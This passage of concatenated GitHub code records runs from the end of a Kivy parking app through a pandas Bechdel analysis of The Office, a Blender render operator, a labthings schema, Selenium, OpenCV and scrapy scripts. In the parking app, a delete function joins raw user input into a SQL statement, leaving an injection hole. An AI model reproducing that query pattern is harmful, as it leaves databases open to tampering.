Label(text=\"\")\r\n self.m = TextInput(hint_text=\"Car Number\")\r\n closeButton = Button(text=\"Close the pop-up\")\r\n layout.add_widget(w)\r\n layout.add_widget(self.m)\r\n layout.add_widget(x)\r\n layout.add_widget(x1)\r\n layout.add_widget(x2)\r\n layout.add_widget(closeButton)\r\n popup = Popup(title='Delete Registered Vehicle', content=layout, size_hint=(None, None), size=(350, 350))\r\n popup.open()\r\n closeButton.bind(on_press=self.dell)\r\n\r\n def dell(self, a):\r\n connection = sqlite3.connect(\"security.db\")\r\n crsr = connection.cursor()\r\n a = \"\"\"Delete from Details where Car_no = \"\"\" + self.m.text\r\n print(a)\r\n crsr.execute(a)\r\n connection.commit()\r\n connection.close()\r\n engine = pyttsx3.init()\r\n engine.say(\"Vehicle is removed from database\")\r\n engine.runAndWait()\r\n\r\n def change_picture(self):\r\n engine = pyttsx3.init()\r\n engine.say(\"Number plate detection on images.\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'six'\r\nclass playvideo(BoxLayout):\r\n\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def play(self):\r\n \r\n video = cv2.VideoCapture(PATH_TO_VIDEO)\r\n\r\n while(video.isOpened()):\r\n ret, frame = video.read()\r\n frame_expanded = np.expand_dims(frame, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: frame_expanded})\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n frame,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.90)\r\n cv2.imshow('Object detector', frame)\r\n if (cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\n video.release()\r\n cv2.destroyAllWindows()\r\n def back(self):\r\n sa.screen_manager.current = 'four'\r\n \r\n\r\nclass MyApp(App):\r\n\r\n def build(self):\r\n self.screen_manager = ScreenManager()\r\n\r\n self.one = MainWindow()\r\n screen = Screen(name=\"one\")\r\n screen.add_widget(self.one)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.two = Login()\r\n screen = Screen(name=\"two\")\r\n screen.add_widget(self.two)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.three = Signup()\r\n screen = Screen(name=\"three\")\r\n screen.add_widget(self.three)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.four = MainMenu()\r\n screen = Screen(name=\"four\")\r\n screen.add_widget(self.four)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.five = playvideo()\r\n screen = Screen(name='five')\r\n screen.add_widget(self.five)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.six = pic()\r\n screen = Screen(name='six')\r\n screen.add_widget(self.six)\r\n self.screen_manager.add_widget(screen)\r\n\r\n return self.screen_manager\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sa = MyApp()\r\n sa.run()\r\n","repo_name":"karan650g/Automated-Parking-Solution","sub_path":"WeWillWin.py","file_name":"WeWillWin.py","file_ext":"py","file_size_in_byte":29066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40212590696","text":"import pandas as pd\nimport numpy as np\nimport re\nimport contractions\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import RegexpTokenizer\n#Load data\noffice_data = pd.read_excel(\"/Users/jonzimmerman/Desktop/Data Projects/The Office NLP/the-office-lines.xlsx\")\n\n\n\ndef lemmatize(text):\n lemmed = 
contractions.fix(str(text))\n return lemmed\n\n\ndef removeStopWords(str):\n#select english stopwords\n cachedStopWords = set(stopwords.words(\"english\"))\n#add custom words\n cachedStopWords.update(('like','um','uh','oh',' s ','and','i','I','a','and','so','this','when','it','many','so','cant','yes','no','these'))\n#remove stop words\n new_str = ' '.join([word for word in str.split() if word not in cachedStopWords]) \n return new_str\n\n\n\n#Define functions to clean up script column\ndef punct(text):\n token=RegexpTokenizer(r'\\w+')#regex\n text = token.tokenize(text)\n text= \" \".join(text)\n return text \n\ndef remove_special_characters(text):\n # define the pattern to keep\n pat = r'[^a-zA-z0-9.,!?/:;\\\"\\'\\s]' \n return re.sub(pat, '', text)\n\n\ndef remove_digits(text):\n pattern = r'[^a-zA-z.,!?/:;\\\"\\'\\s]' \n return re.sub(pattern, '', text)\n\ndef remove_brackets_contents(text):\n pattern = r\"\\[.*?\\]\"\n return re.sub(pattern, \"\", text)\n\n\n\n#Clean up script\n#0.) Convert column to string type\noffice_data['line_text'] = office_data['line_text'].astype('str')\n#1.) Convert to lowercase\noffice_data['cleaned_text'] = office_data['line_text'].str.lower()\n#2.) Remove brackets\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = remove_brackets_contents)\n#3.) Lemmatize words\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = lemmatize)\n#4.) Remove stop words\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = removeStopWords)\n#5.) Remove punctuation\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = punct)\n#6.) Remove special characters\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = remove_special_characters)\n#7.) Remove digits\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = remove_digits)\n#8.) 
Remove stop words again created from previous functions\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = removeStopWords)\n\n\n\n#Bechdel test\n#Step 1: Indicator for when male is mentioned in conversation\noffice_data['male_subject'] = np.where(# where(condition, [x, y])\n office_data['cleaned_text'].str.contains('he|him|his|michael|jim|kevin|oscar|stanley|toby|roy|ryan|andy|creed|darryl|gabe|david wallace|dwight|todd packer|todd|david'), 1, 0)\n\n#Step 2: Indicator for when a woman is in the scene\noffice_data['women_speaking'] = np.where((office_data['speaker']=='Pam') |\n (office_data['speaker']=='Jan') |\n (office_data['speaker']=='Kelly') |\n (office_data['speaker']==\"Phyllis\") |\n (office_data['speaker']==\"Angela\") |\n (office_data['speaker']==\"Erin\") |\n (office_data['speaker']==\"Holly\") |\n (office_data['speaker']==\"Karen\") |\n (office_data['speaker']==\"Meredith\") \n , 1, 0)\n\n#All women characters\nwomen = office_data[office_data['women_speaking']==1]\nall_women_mains = women['speaker'].sort_values().unique()\n\n#Filter down to the lines spoken by ONLY the main characters\nmain_characters = office_data[office_data['speaker'].str.contains('Andy|Angela|Creed|Darryl|David Wallace|Dwight|Erin|Gabe|Pam|Jan|Jim|Holly|Karen|Kelly|Kevin|Meredith|Michael|Oscar|Pam|Phyllis|Roy|Ryan|Stanley|Toby|Todd Packer')]\n\n#Identify lines spoken per scene and merge metric back into full main character dataset\nlines_per_scene = main_characters.groupby(['season', 'episode','scene']).size().reset_index(name='counts')\nnew_df = pd.merge(main_characters, lines_per_scene, how='left', left_on=['season','episode','scene'], right_on = ['season','episode','scene'])\n\n#Sum down to # of lines spoken by women in scene and merge back into full main character dataset\ntotal_women_lines = new_df.groupby(['season', 'episode','scene'])['women_speaking'].agg('sum').reset_index(name='tot_wom_lines')\nfull_bechdel = pd.merge(new_df, total_women_lines, how='left', left_on=['season','episode','scene'], right_on = ['season','episode','scene'])\n\n#Filter down to the scenes with only women\nfull_bechdel['all_women_scene'] = full_bechdel['counts'] - full_bechdel['tot_wom_lines']\nonly_women = full_bechdel[full_bechdel['all_women_scene']==0]\n\n#Get rid of all testimonial scenes\nonly_women = only_women[only_women['counts']>1]\n\n\n#Calculate the bechdel score\nbechdel_scores = only_women.groupby(['season','speaker'])['male_subject'].agg('sum').reset_index(name='bech_sum')\ntotal_lines = only_women.groupby(['season','speaker']).agg('count').reset_index()\ntotal_lines = total_lines[['season','speaker','counts']]\nbechdel_percs = pd.merge(bechdel_scores, total_lines, how='left', left_on=['season','speaker'], right_on = ['season','speaker'])\n\nbechdel_percs['b_percent'] = round((bechdel_percs['bech_sum']/bechdel_percs['counts'])*100,2)\nbechdel_percs\nbechdel_percs.to_csv('/Users/jonzimmerman/Desktop/Data Projects/The Office NLP/bechdel_season.csv', index=False)\n\n#only_women_df = pd.merge(only_women,bechdel_percs,how='left',on=['speaker'])\n#only_women_df.to_csv('/Users/jonzimmerman/Desktop/Data Projects/The Office NLP/bechdel.csv', index=False)\n\n","repo_name":"statzenthusiast921/The_Office_Project","sub_path":"scripts/bechdel.py","file_name":"bechdel.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4606798436","text":"import bpy\nimport math\n\nclass 
default_render_settings(bpy.types.Operator):\n '''Set our default render settings.'''\n bl_idname = 'render.default_render_settings'\n bl_label = 'Default Render Settings'\n bl_options = {'REGISTER', 'UNDO'}\n \n\n set_for_all_scenes = bpy.props.BoolProperty(\n name = 'Set for all scenes',\n description = 'Set the following settings for all Scenes in this .blend file.',\n default = False\n )\n\n set_render_engine = bpy.props.EnumProperty(\n name = 'Render Engine',\n description = 'Select rendering engine',\n items = [\n ('CYCLES', 'Cycles',''),\n ('BLENDER_RENDER', 'Blender Render','')\n ]\n )\n\n set_render_device = bpy.props.EnumProperty(\n name = 'Render Device',\n description = 'Select rendering device. GPU can only be used by Cycles.',\n items = [\n ('GPU', 'GPU',''),\n ('CPU', 'CPU','')\n ]\n )\n\n resolution_mode = bpy.props.EnumProperty(\n name = 'Resolution mode',\n description = 'Choose if the render resolution should adapt to the camera Orthographic scale, if the camera should adapt to the render resolution, or set resolution manually.',\n items = [\n ('Smart Resolution', 'Smart Resolution', ''),\n ('Smart Camera' , 'Smart Camera' , ''),\n ('Manual' , 'Manual' , '')\n ]\n )\n\n set_resolution_x = bpy.props.IntProperty(\n name = 'Render Resolution X',\n default = 576\n )\n set_resolution_y = bpy.props.IntProperty(\n name = 'Render Resolution Y',\n default = 576\n )\n set_resolution_percentage = bpy.props.IntProperty(\n name = 'Resolution Percentage',\n default = 100\n )\n\n set_multicomputer = bpy.props.BoolProperty(\n name = 'Render on multiple computers',\n description = 'To render on multiple computers, the output filepath will change to a cache, enabling Placeholder and disabling Overwrite settings.',\n default = False\n )\n\n set_filepath = bpy.props.StringProperty(\n name = 'Render Output File Path',\n description = 'Path for render output, disabled if Multicomputer is used. Compositor File Output nodes are unaffected.',\n default = '//OUTPUT\\\\\\\\x\\\\x_'\n )\n\n set_image_compression = bpy.props.IntProperty(\n name = 'Image Compression',\n default = 100,\n min = 0,\n max = 100\n )\n\n set_frame_start_override = bpy.props.BoolProperty(\n name = 'Override Starting frame',\n description = 'Choose if the Starting frame should be changed',\n default = False\n )\n set_frame_start = bpy.props.IntProperty(\n name = 'Starting frame',\n description = 'Set the first rendered frame.',\n default = 0\n )\n\n set_frame_end_override = bpy.props.BoolProperty(\n name = 'Override Ending frame',\n description = 'Choose if the Ending frame should be changed',\n default = False\n )\n set_frame_end = bpy.props.IntProperty(\n name = 'Ending frame',\n description = 'Set the last rendered frame.',\n default = 0\n )\n \n\n set_use_border = bpy.props.BoolProperty(\n name = 'Use render border',\n description = 'Use the render border set by Ctrl+B.',\n default = False\n )\n set_crop_to_border = bpy.props.BoolProperty(\n name = 'Crop render to border',\n description = 'Crop the render to the border set by Ctrl+B.',\n default = False\n )\n\n set_samples = bpy.props.IntProperty(\n name = 'Samples',\n description = 'Rendering samples.',\n default = 1000\n )\n set_use_animated_seed = bpy.props.BoolProperty(\n name = 'Animated Seed for Samples',\n description = 'Each frame is rendered with different seed for sampling.',\n default = True\n )\n\n set_automatic_render_tile_size = bpy.props.BoolProperty(\n name = 'Automatic render tile size',\n description = 'Automatically set size of render tiles. 
Maximal for GPU, minimal for CPU.',\n default = True\n )\n set_render_tile_size_x = bpy.props.IntProperty(\n name = 'Manual render tile size X',\n description = 'Manually set X size of render tiles. Only works when Automatic render tile size is OFF.',\n default = 128\n )\n set_render_tile_size_y = bpy.props.IntProperty(\n name = 'Manual render tile size Y',\n description = 'Manually set Y size of render tiles. Only works when Automatic render tile size is OFF.',\n default = 128\n )\n\n set_transparent_max_bounces = bpy.props.IntProperty(\n name = 'Max Transparent Bounces',\n description = 'Limit the amount of light bounces used for transparency.',\n default = 0\n )\n set_caustics_reflective = bpy.props.BoolProperty(\n name = 'Reflective Caustics',\n description = 'Enable or disable reflective caustics.',\n default = False\n )\n set_caustics_refractive = bpy.props.BoolProperty(\n name = 'Refractive Caustics',\n description = 'Enable or disable refractive caustics.',\n default = False\n )\n set_transparent_film = bpy.props.BoolProperty(\n name = 'Transparent Film',\n description = 'Enable or disable Transparent film.',\n default = True\n )\n\n def execute(self,context):\n \n # settings for current scene or all scenes\n if self.set_for_all_scenes == False:\n list_of_scenes = [bpy.context.scene]\n else:\n list_of_scenes = []\n for scene in bpy.data.scenes:\n list_of_scenes.append(scene)\n\n for scn in list_of_scenes:\n # cycles\n scn.render.engine = self.set_render_engine\n\n # GPU rendering\n scn.cycles.device = self.set_render_device\n\n\n # Disable Border\n scn.render.use_crop_to_border = self.set_crop_to_border\n scn.render.use_border = self.set_use_border\n\n # Camera settings\n #obj_camera = bpy.data.objects['CAME-GAME']\n #obj_camera.data.ortho_scale = 36\n\n # File output path for scene\n if self.set_multicomputer == False:\n scn.render.filepath = self.set_filepath\n scn.render.use_overwrite = True\n scn.render.use_placeholder = False\n else:\n scn.render.filepath = '//cache\\\\\\\\' + scn.name + '/' + scn.name + '-cache_'\n scn.render.use_overwrite = False\n scn.render.use_placeholder = True\n\n\n # 1000 samples\n scn.cycles.samples = self.set_samples\n\n # Random seed for sampling\n scn.cycles.use_animated_seed = self.set_use_animated_seed\n\n # Light Paths and Caustics\n scn.cycles.transparent_max_bounces = self.set_transparent_max_bounces\n scn.cycles.caustics_reflective = self.set_caustics_reflective\n scn.cycles.caustics_refractive = self.set_caustics_refractive\n\n # Render Dimensions\n\n # get scene's camera\n \n\n if self.resolution_mode == 'Smart Resolution':\n if bpy.context.scene.camera is None:\n self.report({'ERROR'}, 'Scene has no active camera.')\n else:\n camera_ortho_scale = bpy.data.cameras[bpy.context.scene.camera.data.name].ortho_scale\n scn.render.resolution_x = round(camera_ortho_scale / 4 * 64)\n scn.render.resolution_y = round(camera_ortho_scale / 4 * 64)\n\n elif self.resolution_mode == 'Smart Camera':\n if bpy.context.scene.camera is None:\n self.report({'ERROR'}, 'Scene has no active camera.')\n else:\n bpy.data.cameras[bpy.context.scene.camera.data.name].ortho_scale = scn.render.resolution_x *4 /64\n\n else: # Manual mode\n scn.render.resolution_x = self.set_resolution_x\n scn.render.resolution_y = self.set_resolution_y\n \n # render resolution percentage\n scn.render.resolution_percentage = self.set_resolution_percentage\n\n # Render tile size\n if self.set_automatic_render_tile_size == True:\n if self.set_render_engine == 'CYCLES' and 
self.set_render_device == 'GPU':\n                    # one tile covering the whole frame is fastest on GPU\n                    scn.render.tile_x = scn.render.resolution_x\n                    scn.render.tile_y = scn.render.resolution_y\n                else:\n                    scn.render.tile_x = 32\n                    scn.render.tile_y = 32\n            else:\n                scn.render.tile_x = self.set_render_tile_size_x\n                scn.render.tile_y = self.set_render_tile_size_y\n\n            # PNG compression\n            scn.render.image_settings.compression = self.set_image_compression\n\n            # Transparent Film\n            scn.cycles.film_transparent = self.set_transparent_film\n\n            # start and end frame\n            if self.set_frame_start_override == True:\n                scn.frame_start = self.set_frame_start\n            if self.set_frame_end_override == True:\n                scn.frame_end = self.set_frame_end\n\n        return {'FINISHED'}","repo_name":"V453000/V-tools","sub_path":"Vtools_default_render_settings.py","file_name":"Vtools_default_render_settings.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"11329151582","text":"## AUTHOR: GABRIEL DE OLIVEIRA FREIRE SILVA\n\ndef buscaFrom(query):\n    try:\n        pos_from = query.split(\" \").index(\"from\")\n    except ValueError:\n        print(\"O parâmetro from não foi inserido\")\n        return False, 0\n\n    return True, pos_from","repo_name":"gabrielofs/py_csv_db","sub_path":"buscas/busca_from.py","file_name":"busca_from.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19214012272","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom datetime import datetime\nfrom typing import Any, Dict, Optional, Union\n\nfrom flask import url_for\nfrom marshmallow import Schema, pre_dump, pre_load, validate\nfrom werkzeug.routing import BuildError\n\nfrom . import fields\nfrom .names import ACTION_ENDPOINT, EXTENSION_LIST_ENDPOINT\nfrom .utilities import description_from_view, view_class_from_endpoint\n\n__all__ = [\"Schema\", \"pre_load\", \"pre_dump\", \"validate\", \"FuzzySchemaType\"]\n\n# Type alias for a Schema, Field, or Dict of Fields or Types\nFuzzySchemaType = Union[Schema, fields.Field, Dict[str, Union[fields.Field, type]]]\n\n\nclass FieldSchema(Schema):\n    \"\"\" \"Virtual schema\" for handling individual fields treated as schemas.\n\n    For example, when serializing/deserializing individual values that are not\n    attributes of an object, like passing a single number as the request/response body\n    \"\"\"\n\n    def __init__(self, field: fields.Field):\n        \"\"\"Create a converter for data of the field type\n\n        Args:\n            field (Field): Marshmallow Field type of data\n        \"\"\"\n        Schema.__init__(self)\n        self.field = field\n\n    def deserialize(self, value):\n        \"\"\"Deserialize a single value using the wrapped field.\n\n        :param value:\n\n        \"\"\"\n        return self.field.deserialize(value)\n\n    def serialize(self, value):\n        \"\"\"Serialize a value to Field type\n\n        :param value: Data to serialize\n        :returns: Serialized data\n\n        \"\"\"\n        obj = type(\"obj\", (object,), {\"value\": value})\n\n        return self.field.serialize(\"value\", obj)\n\n    # We disable pylint unused-argument so we can keep the same signature as the base class\n    # pylint: disable=unused-argument\n    def dump(self, obj: Any, *, many: Optional[bool] = None):\n        \"\"\"\n        :param obj:\n        \"\"\"\n        return self.serialize(obj)\n\n\nclass LogRecordSchema(Schema):\n    name = fields.String()\n    message = fields.String()\n    levelname = fields.String()\n    levelno = fields.Integer()\n    lineno = fields.Integer()\n    filename = fields.String()\n    created = fields.DateTime()\n\n    @pre_dump\n    def preprocess(self, data, **_):\n        if isinstance(data, 
logging.LogRecord):\n data.message = data.getMessage()\n if not isinstance(data.created, datetime):\n data.created = datetime.fromtimestamp(data.created)\n return data\n\n\nclass ActionSchema(Schema):\n \"\"\"Represents a running or completed Action\n\n Actions can run in the background, started by one request\n and subsequently polled for updates. This schema represents\n one Action.\"\"\"\n\n action = fields.String()\n _ID = fields.String(data_key=\"id\")\n _status = fields.String(\n data_key=\"status\",\n validate=validate.OneOf(\n [\"pending\", \"running\", \"completed\", \"cancelled\", \"error\"]\n ),\n )\n progress = fields.Integer()\n data = fields.Raw()\n _request_time = fields.DateTime(data_key=\"timeRequested\")\n _end_time = fields.DateTime(data_key=\"timeCompleted\")\n log = fields.List(fields.Nested(LogRecordSchema()))\n\n input = fields.Raw()\n output = fields.Raw()\n\n href = fields.String()\n links = fields.Dict()\n\n @pre_dump\n def generate_links(self, data, **_):\n \"\"\"\n\n :param data:\n :param **kwargs:\n\n \"\"\"\n # Add Mozilla format href\n try:\n url = url_for(ACTION_ENDPOINT, task_id=data.id, _external=True)\n except BuildError:\n url = None\n data.href = url\n\n # Add full link description\n data.links = {\n \"self\": {\n \"href\": url,\n \"mimetype\": \"application/json\",\n **description_from_view(view_class_from_endpoint(ACTION_ENDPOINT)),\n }\n }\n\n return data\n\n\ndef nest_if_needed(schema):\n \"\"\"Convert a schema, dict, or field into a field.\"\"\"\n # If we have a real schema, nest it\n if isinstance(schema, Schema):\n return fields.Nested(schema)\n # If a dictionary schema, build a real schema then nest it\n if isinstance(schema, dict):\n return fields.Nested(Schema.from_dict(schema))\n # If a single field, set it as the output Field, and override its data_key\n if isinstance(schema, fields.Field):\n return schema\n\n raise TypeError(\n f\"Unsupported schema type {schema}. 
\"\n \"Ensure schema is a Schema object, Field object, \"\n \"or dictionary of Field objects\"\n )\n\n\ndef build_action_schema(\n output_schema: Optional[FuzzySchemaType],\n input_schema: Optional[FuzzySchemaType],\n name: Optional[str] = None,\n base_class: type = ActionSchema,\n):\n \"\"\"Builds a complete schema for a given ActionView.\n\n This method combines input and output schemas for a particular\n Action with the generic ActionSchema to give a specific ActionSchema\n subclass for that Action.\n\n This is used in the Thing Description (where it is serialised to\n JSON in-place) but not in the OpenAPI description (where the input,\n output, and ActionSchema schemas are combined using `allOf`.)\n\n :param output_schema: Schema:\n :param input_schema: Schema:\n :param name: str: (Default value = None)\n\n \"\"\"\n # Create a name for the generated schema\n if not name:\n name = str(id(output_schema))\n if not name.endswith(\"Action\"):\n name = f\"{name}Action\"\n\n class_attrs: Dict[str, Union[fields.Nested, fields.Field, str]] = {}\n\n class_attrs[\n \"__doc__\"\n ] = f\"Description of an action, with specific parameters for `{name}`\"\n if input_schema:\n class_attrs[\"input\"] = nest_if_needed(input_schema)\n if output_schema:\n class_attrs[\"output\"] = nest_if_needed(output_schema)\n\n return type(name, (base_class,), class_attrs)\n\n\nclass EventSchema(Schema):\n event = fields.String()\n timestamp = fields.DateTime()\n data = fields.Raw()\n\n\nclass ExtensionSchema(Schema):\n \"\"\" \"\"\"\n\n name = fields.String(data_key=\"title\")\n _name_python_safe = fields.String(data_key=\"pythonName\")\n _cls = fields.String(data_key=\"pythonObject\")\n meta = fields.Dict()\n description = fields.String()\n\n links = fields.Dict()\n\n @pre_dump\n def generate_links(self, data, **_):\n \"\"\"\n\n :param data:\n :param **kwargs:\n\n \"\"\"\n d = {}\n for view_id, view_data in data.views.items():\n view_cls = view_data.get(\"view\")\n view_urls = view_data.get(\"urls\")\n # Try to build a URL\n try:\n urls = [\n url_for(EXTENSION_LIST_ENDPOINT, _external=True) + url\n for url in view_urls\n ]\n except BuildError:\n urls = []\n # If URL list is empty\n if len(urls) == 0:\n urls = None\n # If only 1 URL is given\n elif len(urls) == 1:\n urls = urls[0]\n # Make links dictionary if it doesn't yet exist\n d[view_id] = {\"href\": urls, **description_from_view(view_cls)}\n\n data.links = d\n\n return data\n","repo_name":"labthings/python-labthings","sub_path":"src/labthings/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"38705870693","text":"from selenium import webdriver\n\nclass FindByLinkText():\n def test(self):\n baseUrl = \"https://letskodeit.teachable.com/p/practice\"\n driver = webdriver.Chrome()\n driver.maximize_window()\n driver.get(baseUrl)\n elementByLinkText = driver.find_element_by_link_text(\"Practice\")\n elementByPartialLinkText = driver.find_element_by_partial_link_text(\"Logi\")\n if elementByLinkText is not None:\n print(\"We found an element by Link Text\")\n\n if elementByPartialLinkText is not None:\n print(\"We found an element by Partial Link text\")\n\nff = 
FindByLinkText()\nff.test()","repo_name":"Lunchesque/udemy","sub_path":"python_projects/SeleniumTutorial/FindingElemenst/FindElementByLiknText.py","file_name":"FindElementByLiknText.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13397672816","text":"'''\n283. Move Zeroes\n\nGiven an integer array nums, move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\nNote that you must do this in-place without making a copy of the array.\n'''\n\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n for item in nums:\n if item == 0:\n nums.remove(item)\n nums.append(item)\n \n return nums\n\n\n'''\nsol2) Two Pointers\n\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n zero = 0 # records the position of \"0\"\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[i], nums[zero] = nums[zero], nums[i]\n zero += 1\n'''","repo_name":"kss02281/Algorithm_Study","sub_path":"2022_Solved/1주차/leetcode_Easy/283.py","file_name":"283.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29008719220","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\nbacksub = cv2.createBackgroundSubtractorMOG2()\r\ncapture = cv2.VideoCapture(\"{video_path}\")\r\nblank_image = np.zeros((600,800), np.uint8)\r\ncv2.rectangle(blank_image, (500, 580), (200, 0), (255,255,255), -1)\r\n\r\nsayac=0\r\n\r\n\r\nif capture:\r\n\r\n while True:\r\n\r\n ret, frame = capture.read()\r\n\r\n if ret:\r\n fgmask = backsub.apply(frame, None, 0.01)\r\n cv2.line(frame, (200,220), (500,220), (255,255,0), 2)\r\n cv2.line(frame, (200,240), (500,240), (255,255,0), 2)\r\n\r\n fgmask = cv2.bitwise_and(fgmask, blank_image)\r\n #kernel = np.ones((5,5), np.uint8)\r\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2,2))\r\n img_closing = cv2.morphologyEx(fgmask, cv2.MORPH_CLOSE, kernel)\r\n img_opening = cv2.morphologyEx(img_closing, cv2.MORPH_OPEN, kernel)\r\n img_dilation = cv2.dilate(img_opening, kernel, iterations=2)\r\n #th = img_dilation[img_dilation < 240] =0\r\n \r\n \r\n img_erosion = cv2.erode(fgmask, kernel, iterations=1)\r\n \r\n contours, hierarchy = cv2.findContours(img_dilation.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\r\n try: hierarchy = hierarchy[0]\r\n except: hierarchy = []\r\n for contour, hier in zip(contours, hierarchy):\r\n (x,y,w,h) = cv2.boundingRect(contour)\r\n \r\n if w > 40 and h > 40:\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n if y > 220 and y < 240:\r\n sayac+=1\r\n print(sayac)\r\n \r\n cv2.putText(frame,\"Araba: \"+str(sayac), (220, 20), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.6, (0, 0, 0), 2)\r\n\r\n cv2.imshow(\"Takip\", frame)\r\n #cv2.imshow(\"Arka Plan Cikar\", fgmask)\r\n cv2.imshow(\"Final\", img_dilation)\r\n #cv2.imshow(\"erosion\", img_erosion)\r\n #cv2.imshow(\"dilation\", img_dilation)\r\n #cv2.imshow(\"erosion_fgmask\", img_erosion_org)\r\n\r\n\r\n\r\n key = cv2.waitKey(60)\r\n if key == ord('q'):\r\n break\r\n\r\ncapture.release()\r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"erenyetisgin/smart-traffic-lights","sub_path":"Image 
Processing/Background_subtraction.py","file_name":"Background_subtraction.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11330523482","text":"import scrapy\n\n\nclass CungusSpider(scrapy.Spider):\n name = \"cungus\"\n allowed_domains = [\"www.cungus.bel.tr\"]\n start_urls = [\"http://www.cungus.bel.tr/kurum/muhtarlar/\"]\n\n def parse(self, response):\n for i, entry in enumerate(response.css(\"table > tbody > tr\")):\n data = entry.css(\"td::text\").getall()\n\n village = data[0].strip()\n mukhtar = data[1].strip()\n tel = data[2].strip()\n\n yield {\n \"Il\": \"Diyarbakir\",\n \"Ilce\": \"Çüngüş\",\n \"Muhtarlik\": village,\n \"Muhtar\": mukhtar,\n \"Tel\": tel,\n \"Kaynak\": self.start_urls[0],\n }\n","repo_name":"furkanakkurt1335/23-2-6_parse","sub_path":"muhtarliklar/muhtarliklar/spiders/cungus.py","file_name":"cungus.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32164204957","text":"import pickle\nimport os\nimport numpy as np\nimport random\n\nrandom.seed(121)\nnp.random.seed(121)\n\n\ndef load_data(file):\n with open(file, 'rb') as fo:\n data = pickle.load(fo, encoding='latin1')\n return data\n\n\ndef save_data(obj, file):\n with open(file, 'wb+') as f:\n pickle.dump(obj, f, )\n\n\ndataset_dir = './data/MiniImagenet/'\nsample_data_dir = './data/sample_data/'\ntrain_dir = os.path.join(dataset_dir, 'miniImageNet_category_split_train_phase_train.pickle')\nval_dir = os.path.join(dataset_dir, 'miniImageNet_category_split_val.pickle')\ntest_dir = os.path.join(dataset_dir, 'miniImageNet_category_split_test.pickle')\nos.makedirs(sample_data_dir, exist_ok=True)\n\ntrain_data = load_data(train_dir)\ndev_data = load_data(val_dir)\ntest_data = load_data(test_dir)\n\ntrain_idx = np.random.permutation(len(train_data['labels']))[:1000]\ndev_idx = np.random.permutation(len(dev_data['labels']))[:400]\ntest_idx = np.random.permutation(len(test_data['labels']))[:400]\n\ntrain_data = {'catname2label': train_data['catname2label'],\n 'labels': [train_data['labels'][x] for x in train_idx],\n 'data': train_data['data'][train_idx]\n }\n\ndev_data = {'catname2label': dev_data['catname2label'],\n 'labels': [dev_data['labels'][x] for x in dev_idx],\n 'data': dev_data['data'][dev_idx],\n 'label2catname': dev_data['label2catname']\n }\n\ntest_data = {'catname2label': test_data['catname2label'],\n 'labels': [test_data['labels'][x] for x in test_idx],\n 'data': test_data['data'][test_idx],\n 'label2catname': test_data['label2catname']\n }\n\n# save_data(train_data, sample_data_dir + 'miniImageNet_category_split_train_phase_train.pickle')\nsave_data(dev_data, sample_data_dir + 'miniImageNet_category_split_val.pickle')\nsave_data(test_data, sample_data_dir + 'miniImageNet_category_split_test.pickle')\n","repo_name":"renmada/ICI-paddle","sub_path":"generate_sample_data.py","file_name":"generate_sample_data.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35899321064","text":"from flask import Flask\nfrom flask_restful 